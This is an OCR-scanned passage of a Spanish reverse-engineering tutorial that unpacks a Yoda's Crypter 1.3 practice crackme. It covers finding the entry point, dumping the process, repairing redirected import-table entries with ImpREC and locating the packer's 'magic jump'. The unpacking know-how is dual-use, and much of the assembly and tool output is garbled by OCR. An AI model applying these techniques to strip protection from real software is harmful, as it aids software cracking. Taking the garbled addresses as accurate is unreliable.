SAFFSARA! ARAASARA! EAMETI 221. vr 


Set break-on-access F2 


br 
Set memory breakpoint on write 


kpoint on acc 


[O] File view Debug Plugins Options Window Help 
. . . 
E 4): X| *e|Il| 54: + >» 
PUSH EBP 
MOU EBP, ESP 
PUSH -1 
PUSH 450E60 
PUSH 429208 
31 M0U EAX, DWORD PTR FS: [8] 
PUSH EAK 
MOU DWORD _PTR FS:[01,ESP 


EDI 

3 MOU DWORD _PTR SS: [EBP-18],ESP 

18 Dconssos “CALL DWORD PTR DS: [460ADC1 kerne 132, GetVersion 
: X0OR EDX, EDX IN 
ARA? MAL AL. AH 


Alli esta el OEP es 4271B0 ya que esta empacado siempre con el mismo crackme, jeje. 


PUSH_EBP 
MOU EBP,ESP 


PUSH _EDI 

MOU EAX, DWORD PTR SS: CEBP+10] 

34 MOU EDI, DWORD _PTR DS: [EAX+C4] 
PUSH_DWORD PTR DS: [EDI] 

OR EDI,EDI 

DWORD PTR FS: CEDIJ 

DWORD PTR DS: [EAX+C041,3 

EDI, DWORD PTR DS: [ERAX+A4] 


EDI, 7 
DWORD PTR DS: [EAX+B8],EDI 
alas EAx, 8 


66 
STOS BYTE PTR ES: [EDIJ 
LOOPD_SHORT 68465954 


MOU EDx,EBP 

ADD EDx, 463182 

LEA EDI, DWORD PTR DS: [EDxJ 
MOU ECX, 48345D 


mex] e Jn] vis] sit] 1] > 1] ejmit]wjH]c]//x/B]R]...] s] 


UnPackMe. 00427180 


UnPackMe. 66465954 


Los que quieren profundizar un poco mas ya pueden ver que en el manejador de excepciones se 
manipula el context para modificar EIP y por lo tanto la direccion de la excepcion, que era 
normalmente 465982, o sea donde se produjo la excepcion, y es sobreescrita con la direccion del 
OEP o sea 4271B0 para que retorne de la excepcion directo al OEP, aunque esto no importa mucho 
por ahora, lo dejamos anotado para futuros estudios que hagamos de la estructura CONTEXT. 


Bueno la cuestion es que ya estamos en el OEP, podemos DUMPEAR. 


1 HideOD 

2 CommandBar 

3 Puntos Mágicos 
4 +BP-OLLY 


D 


ADD ESP, -58 Find OEP by Section Hop (Trace intó 


PUSH EBX 


PUSH ESI Find NFP hw Sertinn Hon (Trare nuert 


OllyDump - UnPackMe_YodasCrypter1.3.e.exe 


Start Address: [400000 Size: [67000 
Entry Point: [65060 > Modify: (27180 Get ElP as DEP | Cancel | 


Base of Code: h 000 Base of Data: [48 000 


ÍV Fix Raw Size € Offset of Dump Image 


| Section | Virtual Size_ | Virtual Dífset | Raw Size__| Raw Ofíset 


000491 7F 00001000 000491 7F 00001000 EDO00020 
OO00BED8 00048000 0000BED8 00048000  CO000040 
OO008BE4 00057000 O0008BE4 00057000 C0000040 
OO002B8EC. 00060000 DOO02BEC. 00060000 C0000040 
0000140€. 00063000 0000140€C— 00063000 40000040 
00002000 0065000 00002000 0065000 EDODODEO 


r «— Import 


(+ Method1 : Sd auch JMP[API] | CALL[API] in memory image 
CC Method2: Search DLL 8: 4PI name string in dumped file 


Le quitamos la tilde para que no intente reparar la IAT y DUMPEAMOS. 


Puro 


EP Google Talk 


Mis sitios de red Nombre: [vodadump y] 
Tipo: | Executable file(* exe) y Cancelar Ñ 


bu12F023/66 060 606 66 60 00 060 66 
6012FD030/B6 60 00 04 06 06 46 BA|.. 
ARISENSSIAR ARA CAR CAR CAR AR CAR CAR 


Por supuesto si ejecutamos el yodadump.exe nos da error, nos podriamos haber dado por muy 
afortunados si corriera solo en nuestra maquina, pero ya veremos que la IAT tiene entradas 
redireccionadas lo cual hace que no pueda correr para nada, al tratar de acceder a esas direcciones 
inexistentes en el dump. 


Bueno comencemos a analizar la IAT, busquemos una llamada a una api, alli debajo vemos una 
llamada a GetVersion la misma de siempre jeje. 


PUSH_EBP 

MOU EBP,ESP 

PUSH -1 

PUSH 450E60 

PUSH_ 429208 

3 MOU EAX, DWORD PTR FS: [0] 
PUSH_EAXx 

, BOBBB6Í MOV DWORD_PTR FS:[07,ESP 

; ADD ESP, -58 

PUSH EBX 

PUSH ESI 

PUSH EDI 

MOU DWORD _PTR SS: [EBP-18],ESP 

EDX, EDX 

DL, AH 

DWORD _PTR DS: [456634], EDXx 

ECX, EAX 


ECX, BFF 
DWORD PTR DS: [45£6307,ECx 
ECx,3 


kerne 132, GetVers ion 


Bueno vemos que dicho CALL toma valores de 460ADC para ver donde saltara o sea que esta es 
una entrada de la IAT, vayamos a verla en el DUMP. 


EE 


E 
3 
Y 


ATEN 


OOOO DOMO PA OOO OO O 


DIMAS NRO ASIS 
€ sumo: 


ue -e«m 


DO'I* 


SOC OOOO DO A DO OOO O 0 O E MO! 


Z* OM. MD As mind 
ITA TS 


y. 


Pues se ve esta parte de la IAT como correcta ya que si miro en el mapa de memoria donde van las 
entradas, todas van a 7C8XXXXX o cercanas y esas direcciones caen en la seccion code de 
kernel32.dll o sea que estas entradas serian correctas. 


77FAEO0O] B0BB2000| SHLWAPI | .esro resources Imag|R RWE 
77FEB0000/| 00006000 | SHLWAPI | .reloc relocations| Imag|R RUE 
70300000 | 009001000 | kerne 132 PE header Imag|R RWE 
7C301000 B00S2000 kernel32 .tent code, import: Imag R RUE 
YC363000| 00665900 | kerne132| .data data Imag|R RUE 
Y 5000 | 00073000 |kernel32| .rsrc resources Imag|R RWE 
7? 5000 | 00BB56BBA | kernel32| .reloc relocations! Imag|R RWE 
r£310000) 00001000/ntdll PE header Imaa!R RWE 


Por lo demas si busco referencias en cualquiera de ellas al azar y haciendo click derecho FIND 
REFERENCES hay referencias. 


Hdadress |ULsassembly Lomment 


DO4BREEG| CALL DWORD PTR DS: [460634] kerne132.ReadConsoleInputA 


Si sigo bajando hasta la separacion 


JA po o o fo Jo o fo fl fr o pu 
MAN ANNAN AN AN CN Un an 


Veo que el siguiente grupo va a una zona de memoria 1I5XXXX veamos que hay alli. 


A ID IS LIA DIC MIDA AY O MI 


00130000| 000020008 Priv | RWE RUE 

00140000| 00063006 Map_|R R 

0150000 00029000 Priv ¡Ru RU 

B0259000' DOBBEDOS Priv |Ruw Ru 

15] (515)M 5151515515151] Map |Ru Ru 

faña naña! Mrs Mara SS nm nm he Fiacciaste 


Vemos una seccion queno hay dll asi que seguramente esa seccion fue creada por el packer, si 
reinicio para comprobarlo. 


001 50000] VODUZODO FEIVY jj Fue rurc 
00140000| DOBB300B Map |R R 
5 5 Priv ¡Ru Ru 
Priv [Ru RU 
Map ¡Ru Ru 
Map |R R xDevicesH: 
B6| BBB3DAGA Map |R R xDevicerH: 
90200000 /| 00041000 Map |R R MDevicesH: 
AASIARAR!| ARAARLARA Man |R R xñenmicesH: 


Vemos que hay una seccion creada por el sistema de 3000 bytes, pero la que usa el packer es de 
29000 bytes mucho mas larga asi que el packer agrando esa seccion para su uso. 


Por lo tanto estas son entradas redireccionadas por el packer a esa seccion, veamos una de ellas a 
ver como trabaja. 


DE 


mi¿iviól 


Tomare una de ellas, por ejemplo esta, y buscare la referencia, haciendo click derecho FIND 
REFERENCES. 


a A A] Y a A A A A] —y Y Y A Y Y SS Y Y 


Address |Disassembl Comment 


B0446685| CALL DWORD PTR DS: [46BBACI DS: [9456460BACI=0615334D 
B04466CB| CALL DWORD PTR DS: [46B0BACI DS: [060460BACI=0615334D 


Hay dos calls que toman valores de dicha entrada, mirare el primero haciendo doble click en el, me 
llevara en el listado adonde esta ubicado. 


Ba 57 PUSH EDI 

00446 53 PUSH EBX 

ga4 FF15 ACOB4600 

00446 33F6 XOR ESI,ESI 

00446 2B3D cooa460a |MOU EDI,DWORD PTR DS: [469AC0] kerne132.WideCharToMu ltiByte 
00446 56 PUSH ESI 

and. PUSH ESI 

00446 S2BE8 MOU EBP,EAX 

00446 56 USH ESI 

004 56 PUSH ESI 

004 55 PUSH EBP 

004 53 PUSH EBX 

004 56 PUSH ESI 

004 56 PUSH ESI 

004 FFD? 

00446 50 PUSH _EAX 

00446 8B4024 18 MOU ECX, DWORD PTR SS: [ESP+18] 

00446 894424 1C MOU DWORD _PTR SS: [ESP+1C],EAX 

aB4S ES B259FFFF CALL MB43CBSF UnPackMe. B043CBSF 
00446 56 PUSH ESI 


Alli eS el aa ns amos click derecho FOLLOW a ver que hace en la seccion redireccionada. 


al >] 1) Ed 


E918FAT6 OLEAUT32. SysStringLen 
3D72FC76 OLEAUT32.0OleClreateFontIndirect 
FD17FA?6 OLEAUT32.SysAl locStringLen 
211BFA76 OLEAUT32.SafeArrayGetDim 
32A1FC76 OLEAUT32.SafeArrayGetElemsize 
3010FA7T6 OLEAUT32.SafeArrayGetLBound 
DF1CFAT6 OLEAUT32. SafeArrayGetlUBound 
9BICFAT6 OLEAUT32. SafeArrayAccessData 
CSiCFAT6 OLEAUT32. SafeArraylUnaccessDat a 
SA33FAT6 OLEAUT32.VariantChangeType 
Cc14FA76 OLEAUT32.SysFreeString 
CC18FAT6 OLEAUT32.SysAl locStringByteLen 
3413FA76 OLEAUT32.SysAl locString 
B29FFC76 OLEAUT32.VariantCopy 
ES290077 OLEAUT32.0leLoadPicture 

ADD BYTE PTR DS: [EAXJ],AL 


ADD BYTE PTR DS: [EAXJ], AL 
ADD BYTE PTR DS: [EAXJI, AL 


nh DUTE DTD NC. PFENYA 


¡DE 
Laa 


) 


DD 
DI 
Ele odo po fo fo fo fr Jo pudo pudo pd pudo pu 


Vemos que sin muchos prolegomenos salta a la api SysStringLen directamente,por lo cual si lo 
traceamos a mano ya sabemos cual es la api correcta para esta entrada. 


Vemos que la redireccion es muy sencilla, podra el IMP REC con sus traceadores repararla sin 
necesidad de hallar el magico? 


Abramos el IMP REC. 


Altach to an A4Cctwe Process 


c:Aidocuments and settinastricardo+escritoriovunpackme_ yodas e [ODODOBI( 
c:4odbg110 finallparcheado 4.exe (00000320) y 
c:4archivos de programa! techsmithisnagit 8Mtschelp.exe (00000260) 

c4archivos de programa! techsmithisnagit 8 snagit32. exe (O0000D'60] 


c:4archivos de programa openoffice. org 2.0 programisoffice. bin (ODODO724] | 


c:4archivos de programatopenoffice.org 2.0 programisoffice.exe (00000464) 


Alli esta el proceso detenido en el OEP, lo elegimos en el menu desplegable. 
No olvidemos que al IMP REC debemos darle 3 datos OEP, INICIO DE IAT y LARGO. 
OEP=4271BO0 al cual restandole la imagebase da 271B0 


El inicio de la IAT si subimos en la misma. 


Vemos que las entradas de la IAT o bien van a la seccion code de dlls o bien a la seccion 15xxxxx 


AD OO 00 (E) tra poto punto puro pudo fado Guada fado fado Jato Jato palo fado pudo 
455 Sn 0141 1 0 A nn nn en an an 

o 

o 

o 

1] 

(o 

. 

mr 

to 

. 


co 

po 

-y 

o 
“ar DO 
- de e 


del redireccionamiento, si seguimos subiendo a ver cuando acaban las entradas. 


Vemos que hasta alli se repite el esquema, mas arriba si busco referencias a ver si hay mas entradas 
de la IAT, no hallo en ninguna. 


Por lo cual la primera entrada de la IAT es 460818 para el IMP REC es RVA= 60818 al restarle la 
imagebase. 


El final lo hallo de la misma manera voy bajando a ver donde termina el esquema de entradas que 


AOACOIACOACOACGIACGACAD 


¡Rddress | Bes dun BL] 


¡2NouBsem 
- 


DUDA 


4x0] 0+ 


Address |Disassembly 


Backup » 
Copy » 
Binary » 
Label : 

Breakpoint » 
Search for » 


Find references 
View executablede 


+ 0] Y] > LEJMT|¡WH|cj/ 


Comment 


van a seccion code de dlls o aredireccionadas a la seccion 15XXXX. 


'DEDE 


aaa 


DOE 


E 


y 


y 


uleHandl 
eA..“Bln 
terlocke 
dIincreme 
nt..t6In 


DOS 


Alli vemos la ultima entrada de la IAT es 460f24 mas abajo si busco referencias no hay para 


ninguna entrada, asi que para que la ultima entrada quede dentro, el final de la IAT es 460f28, ahora 
debemos hallar el largo de la misma. 


LARGO=FINAL -INICIO= 460128 - 460818= 710 


A E AAA IMA 


Command 46028 - 460818 y] HEX: 710 - DEC: 1808 - ASCII: DO 


Memaru hreaknnint when esecutina (104271RM 
Asi que poniendo en limpio 


OEP=271B0 
RVA o INICIO=60818 
SIZE O LARGO=710 


Pongamos estos valores en el IMP REC. 


147 Infos needed 


DEP [00027180 147 AutoSearch [ 
RAYA [00060818 Size [00000710 | 


-oad Tree | Save Tree | [G=tImpors ]| | 


Al apretar GET IMPORTS 


* Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


áttach to an Active Process 


[c:idocuments and settings Wwicardosescritorio.unpackme_yodascrypterl.3.e.exe (OOODOB 9 y] Pick DLL 


-Imported Functions Found 
2? FThunk:00060818 NbFunc:5 (decimal:5] valid: NO 
comctl32. dll FThunk:00060830 NbFunc:2 [decimal:2] valid: YES 
+? FThunk:0006083C NbFunc:4D [decimal 77] valid: NO Show Suspect 
+- kemel32.dll FThunk:00060974 NbFunc:8C [decimal:140) valid: YES z 
+- 2 FThunk:00060B48 NbFunc:10 [decimal:16) valid: NO + 

+ shell32. dll FThunk:O00060BEC NbFunc:3 [decimal:3) valid: | 
+? FThunk:O00060BFC NbFunc:43 [decimal:163)] valid: NO > 


É 


Show Invalid 


S£uto Trace 


+? FThunk:D0060£8C NbFunc:1 [decimal:1] valid.NO 
+)? FThunk:D0D0060€ 94 NbFunc:8 (decimal:8] valid: NO Y Clear Imports 
-Log- - 
A IN Clear Log 
odule(s] (added: +3 (decimal: +3)] 
ported function(s]. (added: +1B39 (decimal: +441 om 
Y 
lAT Infos needed; — News Import Infos (ID+4SCI+LOADER]— Options 
DEP [00027180 lAT AutoSearch | RA, [00000000 Size [000008 3€ 
About 
RWa, 100060818 Size [00000710 IV TAdd meli gación 


Feb lb ELL 


Exit 


a Tree | Save Tree | [GstImports ]| Fix Dump l 


Vemos que hay 296 entradas sin resolver, lo podra resolver con algun traceador? 


Si apreto el boton AUTO TRACE se cuelga, probemos con los otros traceadores, apreto SHOW 
INVALIDS y en las entradas marcadas hago click derecho TRACE LEVEL 1. 


Invalidate Functioníús) 
Disassemble | HexView 


Trace Levell (Disasm) 
| Trace Level2 (Hook) » 
Í Trace Level3 (Trap Flag) 


-Imported Functions Found — 


rva:00060818 mod: adwapi32. dll ord:01CB name:RegClosek A 
rva:D0006081C mod:advapi32.dll ord:01E4 name:RegOpe 3 
rea:DOO6 mod: adwapi32. dll ord:01CF name:RegCreate 

rea: DDO6 mod: advapi32.dll ord:07FB name:RegSetYalueE x4, 

rva:D0060828 mod: advapi32.dll ord:01€É name:RegQueryWalueE «4, 


+ comctl32. dll FThunk:00060830 NbFunc:2 [decimal:2] valid YES 
=- gdi32. dll FThunk:0006083C NbFunc:4D (decimal: 77] valid: YES 


al:12] valid module(s) (added: +9 (decimal: +9)) 
al:441)] imported function(s). 

:0] unresolved pointer(s]] [added: -128 (decimal: -296 
Conagratulations! There is no more invalid pointer, now the question is: Will it work? :-) 


Ie. 


Dice que resolvio todo y que no hay mas entradas invalidas, le creemos? Jeje. Si apreto SHOW 
INVALID nuevamente veo que todas estan YES. 


O A A 


+ kemnel32. dll FThunk:00060974 NbFunc:8C (decimal: 140] valid: YES 
+ oleaut32. dll FThunk:00060B48 NbFunc:10 (decimal:16) valid: YES 

1. shell32. dll FT hunk:00060BEC NbFunc:3 (decimal: 3] valid: YES 

/- user32. dll FT hunk:00060BFC NbFunc:43 (decimal:163] valid'YES 
inmam. dll FT hunk:OD060£8C NbFunc:1 (decimal:1] valid: YES 
winspool. drv FThunk:00060E 94 NbFunc:8 (decimal:8)] valid" YES 
comdlg32. dll FThunk:00060EB8 NbFunc:9 (decimal: 9] valid" YES 
ole32.dll FThunk:DOOG60£E 0 NbFunc:10 [decimal:16)] valid:YES 
oledla.dll FThunk:00060F24 NbFunc:1 [decimal:1] valid: YES 


e) + e e) +) +] 


Probemos reparar el yodadump.exe apreto FIX DUMP 


Fixing a dumped file... 
C [decimal:12)] module(s] 

1839 (decimal: 441] imported function(s). 

* New section added successfully, RW4:00067000 SIZE:00002000 De 
Image Import Descriptor size: FO; Total lenath: 1F12 
CADocuments and SettinasiRicardo'E scritorioyodadump_.e > ccessfull. 


Alli me creo el yodadump_.exe que supustamente esta reparado, probemoslo. 


Coded by Teddy Rogers / SnD Team 2005 [Xx] 


Yoda's Crypter 1.3 UnPackMe 
API Redirect 


If you umpack it write a tutorial... :) 


Jeje esta vez se porto el IMP REC y me ahorro mucho trabajo. 


Ahora ademas de esto y para jorobar un poco, tiene salto magico este packer? 


Busquemos una mala entrada en la IAT en el programa que esta detenido en el OEP. 


KE) 1 po poo o o a ua uo fu fu 
SINN NA AN A EA CN 


Dí 


undA. 
é£C 60 AMM. dll. 


Le colocare un HARDWARE BPX ON WRITE antes de reiniciar, ya que los HBP se mantienen, 
aun despues de reiniciar y ya vimos con el metodo del PUSHAD que el packer no es alergico a los 
mismos. 


Memory, on access 
Memory, on write 
Remove memory breakpoint 


Search for 
Follow DWORD in Dump 

Find references Ctrl+R 
View executable file 

Copy to executable file 

Go to » 


Hardware, on access > 


w Hex 


Tarek 


TS O TIO rd. do. o. o. e. e. o. o. o ATT 


Por supuesto el metodo es tratar de parar cuando guarda el valor malo I5XXXX en la entrada, para 
ello reinicio el OLLYDBG y doy RUN. 


UnPackMe. 46465751 


POP EDX 
MOU DWORD PTR DS: [EDX],EAX 
JMP SHORT 60465751 


PUSH EDX 
PUSH_ECX 
MOV EAx, DWORD _PTR DS: [ECX] 


NRaaanaa MUA FO AaRRARA 


B 
BO465A53 U 
BO46283E E 


EIP 00465732 


[fm 


Y lo guarda en la entrada la cual esta siendo apuntada por EDX, quiere decir que en este caso, 


primero guarda el valor bueno y luego lo modifica por el malo, sigamos traceando a ver cuando 
sucede esto. 


MOU ECx,EBP 

ADD ECX, 403479 

LEA EDI,DWORD PTR DS: [ECX] 
MOU ESI,DWORD PTR DS: [EDI+4] 
MOU DWORD _PTR DS: [EDXJ,ESI 
SUB EAX,ESI 


EAX,5 
MOU BYTE PTA DS: CESIJ, 99... 


Vemos que apenas una cuantas lienas mas abajo, EST toma el valor malo y lo va a sobrescribir en la 
entrada. 


' 40465790 U 


e PO ARANA “Mk la (POFFrFrrra 


Quiere decir que las entradas buenas solo escribiran la primera vez y no llegaran a esta segunda 
parte donde sobrescribe con el valor malo. 


Repitamos el proceso ahora con una entrada buena, la de GetVersion que estaba unas lineas debajo 
del OEP estaba correcta asi que usemosla era 460ADC pongo un HBP ON WRITE en ella. 


,1 PUPHU 
A POP EDX 
902 MOU DWORD PTR DS: [EDX],EAX 
vrEB 1D JMP SHORT 00465751 UnPac 
a E PUSH EDX 
15) 


PUSH_ECX 

MOV EAX, DWORD _PTR DS: [ECXI 
suB ERO 30000000 

PUSH EAX 

PUSH_EBX 

MOU EDX,EBP 

ADD _EDX, 493398 ASCII 


TEST EAX, EAX 
Es a 


hoU SUÓRO PTR DS: [EDX],EAX 
PIUISH FAX 


15) 


h 


Vemos que para alli, al guardar la direccion correcta que esta en EAX. 


Xx ?C8114 
; BO4EBZCE U 
''BO4EBADC L 
EX /C8BOBBa ker 
EP BOB62800 


ESI BO46SAZF 
EDI 6046122 


EIP e00eb732 


5 
pe 
al 
0D 
H 


Traceemos un poco. 


[c] File Yiew Debug Plugins Options Window Help 


8BCD 

s1C1 1F324000 
8339 00 

74 14 

S1FB 00000070 
Yr2 BS 
S1FB_FFFFFF?? 
Y6 DE 

EB 30 

EB_6A 

S1FB 0000098sa 
73 B2 

EB 24 

57 

56 

8BCD 

s1C1 79344000 
8039 

3E:8B77 04 
8932 


46 8 
3E:8347 94 95 
SE 

SF 

59 

83C1 94 


UnPackMe. 004657B1 


MOV ECX,EBP 

ADD ECX, 48321F 
CMP_DWORD_PTR_DS: [ECXJ,0 
CMP_EBXx, 70000008 


CMP_EBX, 77FEFFFF 


UnPackMe. 60465783 
UnPackMe. 6046577F 
UnPackMe. 6046578D 
UnPackMe. 004657B1 
UnPackMe. 66046578D 


UnPackMe. 0046573D 
UnPackMe.004657B1 De 


CMP EBX, S50B00B0gB 


H 

U ECX,EBP 

ECXx, 403479 

EDI, OWORD PTR DS: [ECX] 
ESI, DWORD PTR DS: [EDI+4] 
ESE DS: [EDXJ,ESI 


E 
BYTE PTR DS: [ESIJ,0E9 
DWORD PTR DS: [ESI+1],EAX 
DWORD PTR DS: [EDI+4],5 
ESI 
EDI 


ECX 
ECX»4 


Vemos que llega al JMP que evita la zona marcada con la flecha roja donde se cambia por el valor 
malo, asi que el tema es evitar que salte este JMP, algunos de los saltos anteriores que evitan el JMP 
es el salto magico, veamos cual es ya que hay varios saltos condicionales, delante del JMP. 


Tambien podriamos intentar como solucion NOPEAR la linea donde guarda los valores malos asi 
no lo guarda y queda toda la tabla bien, eso seria tambien correcto, podemos probar si funciona. 


DOE 
DDD 
¡DO OO 


ñ 
ñ 
£ 


a 8039 LEA EDI,OWORD PTR DS: [ECXI 

B 3E:3B77 04 MOU ESI,DWORD PTR DS: LEP*+**> 

[5] 28932 MOV DWORD PTR DS: [EDXJ,1 Backup » 

2] BC6 SUB EAX,ESI 

E] 83E8 05 SUB EAX, Copy » 

a C6b6 E9 MOU BYTE PTR DS:[ESIJ,0l N 

15] 3946 61 MOV DWORD PTR DS: [ESI+1 Binary » 

15] 3E:3347 04 65 ¡ADD DWORD PTR DS: [EDI+4 

a SE POP ESI Assemble Space 

a SF POP EDI 

0 59 POP ECX Label 

an 8301 04 ADD ECXx,4 Ñ 
E O E | 

HH q A A 

00 S3C6 aC ADD ESI,9C Breakpoint Togale 
90 2 ES _SBFEFFFF Run trace »  Conditiomal 


Conditional log 


WN ici * 
ev origin here Ctri+Gray Pto salscióón 
Go to » 
17 Follow in Dump »| Memory, on access 
29 Memory, on write 
] Search for » yA 


ecution 


Hardware, on ex 


Find references to 
Vir 


aaa 


ñ 
É 


Para ello marco la linea anterior a la que guarda los valores malos y le coloco un HBP ON 
EXECUTION y reinicio hasta que pare alli por primera vez, lo coloco en la linea anterior porque el 
HBP para una instrucción despues de donde lo coloque y no quiero que me guarde el valor malo. 


UnPackMe. 604657B1 


EDI, DWORD PTR DS: [ECX] 
ESI, DWORD PTR DS: [EDI+4] 
DWORD _PTR DS: [EDXJ,ESI 
EAX, ESI 

EAX,5 

BYTE PTR*DS: [ESIJ,0E9 


DWORD PTR DS: [ESI+1],EAX 
DWORD PTR DS: [EDI+4],5 


LUNY ELN» EDT 


8101 79344000 |ADD ECX, 403479 
8039 LEA EDI,DWORD PTR DS:LECXI 
SE: 8877 04 MOY EST,DUORD PTR DS: [ED1+4] 


oP 
90 NOP 
2BC6 SUB EAX,ESI 
83E8 05 SUB EAX,5 
ens ra MPA MUITO MATA NnFS.Trrerta1 ara 


Ahora sigamos a ver si no detecta el nopeo que hice y llega al OEP. 


Hardware breakpoints 


H Base Size  Stopon 


1 [obse57a9 [ — [Execute Delete 1, 


Quito el HBP y doy RUN 


UnPackMe_YodasCrypter1.3.e.exe 


UnPackMe_YodasCrypterl.3.e.exe ha detectado un 
problema y debe cerrarse. 


Si está en pleno proceso, puede perderse la información con la que esté 
trabajando. 


Informe a Microsoft de este problema. 


Se ha creado un informe de errores que puede enviarnos. Lo 
consideraremos como confidencial y anónimo. 


Para ver los datos que contiene este informe de errores, haga clic aquí. 


Enviar informes de errores | No enviar 


Bueno el maldito detecta los cambios que hice y da error, asi que el nopeo no va, continuemos con 
el salto magico. 


E 40000076 | CMP_EBX, 7O000BGa 

as UnPackMe. B646577F 

B_FFFFFF?? |CMP EBX, ??7FFFFFF 

BE UnPackMe. 66465780 
368 UnPackMe. 664657B 

BA UnPackMe. É 


CMP EBX, 30009000a 


UnPack 


B 
a ”M 
: UnPackMe. 


PUSH EDI 
PUSH ESI 


Traceando cualquier entrada mala, veo que es este el salto magico, el que evita el JMP y me lleva a 


la zona donde guarda el valor malo, asi que habria que nopearlo para llegar al JMP, aunque dudo 
que no detecte el nopeo, igual probemos. 


UnPackMe_YodasCrypter1.3.e.exe 


UnPackMe_YodasCrypterl.3.e.exe ha detectado un 
problema y debe cerrarse. 


Si está en pleno proceso, puede perderse la información con la que esté 
trabajando. 


Informe a Microsoft de este problema. 


Se ha creado un informe de errores que puede enviamos. Lo 
consideraremos como confidencial y anónimo. 


Para ver los datos que contiene este informe de errores, haga clic aquí. 


Enviar informes de errores | No enviar 


Igual en ambos metodos el programa nos da error pero luego de haber reparado correctamente toda 
la tabla si miramos la misma, en el programa que se detuvo por el error. 


[Address [Hex dump__________ [ascir_ | 


C|78 2B 06 00 60 2B 06 DO| y+4."+4. 


a..c 
DG 00 00 06 FB 66 DA 77 | ....-krw 
18 76 DA 77 F4 EA DA 77) vu rwTO rw 
E7 EB DA 77 83 78 DA 77 salda E 


OBOBAOACOAOA 


Ted 
CLA9 34 FO 77 DS 93 EF 77/84-w'5'w 


Veo que la IAT esta toda correcta asi que no hay problema ninguno, tengo dos posibilidades aquí, o 
bien abro en otro OLLYDBG otra instancia del crackme, y sin modificar nada, llego al OEP, y le 
copio y pego la tabla correcta encima de la mala, con BYNARY COPY y BINARY PASTE lo cual 
es muy sencillo, tambien puedo utilizar directamente este proceso para el IMP REC que aunque no 
haya llegado al OEP ya tiene toda la TAT correcta y eso es con lo cual trabaja el IMP REC, el resto 
no importa, asi que si lo abro en el IMP REC y le coloco los valores correctos de OEP; RVA y 
SIZE, y apreto GET IMPORTS. 


Import REConstructor v1.6 FINAL (C) 2001-2003 MackT/uCF 


- áttach to an Ááctive Process 


[ le: Adocuments and settingstricardo+escritorio.unpackme_yodascrypterl.3.e.exe [(ODDDOF1( y] Pick DLL ] 


EE a y 
+ kemel32. dll FThunk:00060974 NbFunc:8C [decimal:140) valid: YES 
1 oleaut32. dll FThunk:00060B4,8 NbFunc:10 [decimal:16)] valid:YES 


1 shell32. dll FThunk:ODO60BEC NbFunc:3 [decimal:3] valid:YES Show Suspect 


Show Invalid 


[+] [+l.-[3 


ra 


1 user32. dll FT hunk:00060BFC NbFunc:43 (decimal:163] valid: YES 
> veinmam.dll FT hunk:DOO60£8C NbFunc:1 (decimal:1] valid: YES 


E] 


+) winspool.dr* FThunk:DD060E 94 NbFunc:8 [decimal:8] valid:YES = 
+)- comdlg32.dll FThunk:OO060£B8 NbFunc:9 [decimal:9] valid:YES 
+- ole32. dll FThunk:O0060£E 0 NbFunc:10 [decimal:16) valid:YES LJ 
+- oledlo.dll FThunk:00060F24 NbFunc:1 [decimal:1] valid. YES v Clear Imports | 
Log- 
Fixing a dumped file... A ——_—— 
C (decimal: 12) module(s) A 
1839 (decimal:441] imported function(s]. Clear Log | 


** New section added successfully. AVA; OE SIZE:00002000 
ade ln ort Descriptor size: FO; Total length: 1 
¿ADocuments and SettinastRicardo+Esc E Sr 


ES] 


exe saved successful. 


VAT Infos needed) ¡News Import Infos (IID+ASCI+LOADER] Options 


OEP f00027180d WT AutoSesich (| || paga foconoooo Size [UDOO1F1E — 
About | 
Ava foDos0st8 Size [0000710 : [EJ 


lv Add new section 


Load Tree | Save Tree | _Getlmports | Imports _GtImpots Fis Dump [ | 


Veo que me salen todos los valores correctos, y aunque el proceso que tengo detenido no me sirva 
para dumpear ya que no llego al OEP, no importa ya que he dumpeado previamente en uno que si 
llego al OEP, y a ese dumpeado solo le falta la tabla que este si tiene correcta, por lo cual puedo 
reparar perfectamente con este proceso el dumpeado que ya tenia hecho, sin problemas y funcionara 
correctamente, si borro el anterior yodadump_.exe que estaba ya reparado y busco el dumpeado 
anterior yodadump.exe, y apreto fix dump y lo reparo. 


Fixing a dumped file... 
C (decimal: 12) module(s) 
1839 (decimal: 441) imported function(s]. 
** New section added successfully. RAWA:00067000 512E:00002000 
Image Import Descriptor size: FO; Total length: 1F1E 
CADocuments and SettinasiRicardo*E scritorioyyodadump_.exe saved successfully. 


1> 


ES] 


Me crea un nuevo yodadump_.exe veamos si funciona. 


Coded by Teddy Rogers / SnD Team 2005 [X] 


Yoda's Crypter 1,3 UnPackMe 
API Redirect 


If you umpack it write a tutorial... :) 


Si funciona perfectamente quiere decir que aprendimos que el dumpeado se necesita hacer desde el 
OEP ya que alli esta todo el programa desempacado en memoria, pero la tabla puede arreglarse 
desde un proceso que la tenga correcta, aunque no haya llegado hasta el OEP, porque el IMP REC 
no cambia nada del DUMPEADO, salvo la IAT la cual esta correcta, por eso el dumpeado funciona 
perfectamente. 


Como ejercicio les dejo el archivo adjunto para desempacar, es muy sencillo si que espero que lo 
puedan hacer sin problemas. 


Hasta la parte 39 
Ricardo Narvaja 
27/03/06 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 40 


Antes de continuar con la tabla IAT del pelock, y los antidumps, en esta parte veremos dos temas, 
uno que quedo en el tintero y otro que es una gran ayuda para continuar con el tpelock o cualquier 
otro programa similar que anula o detecta los HBP ya veremos. 


El primer tema es que en la pate 39 si descargaron el tutorial apenas salio, no se dieron cuenta, pero 
luego fue modificado y aparecia un mensaje de texto que decia. 


Para realizar este tute se debe utilizar el ollydbg parcheado 4 que esta dentro del rar actual, 
es un OLLYDBG parcheado que se debe colocar en la misma carpeta que el OLLYDBG.exe, 
porque el OLLYDBG normal tiene un bug al manejar las ILLEGAL INSTRUCTION, que 
hace que salga un cartel si o si cuando le pones la tilde en debugging options-exceptions para 
saltearla, con el parcheado 4, el bug esta reparado, al momento de hacer el tute lo habia 
olvidado, pero Solid me recordo al no poderlo hacerlo al tute, el problema y al pasarle el 
parcheado 4 para que ponga en la carpeta del OLLYDBG y usarlo, no tiene ningun problema. 


Ricardo Narvaja 


Y traia un OLLYDBG modificado llamado PARCHEADO 4 que se coloca en la misma carpeta del 
OLLYDBG.exe y usando este ultimo sirve mejor para hacer el tutorial de PELOCK. 


Lo que queria explicar como primer punto que tiene de especial este parcheado 4. 
Bueno el OLLYDBG posee un bug al manejar las excepciones ILLEGAL INSTRUCTION; 


Si en un OLLYDBG normal (sea renombrado o no) con los plugins para ocultarlo, marcamos todas 
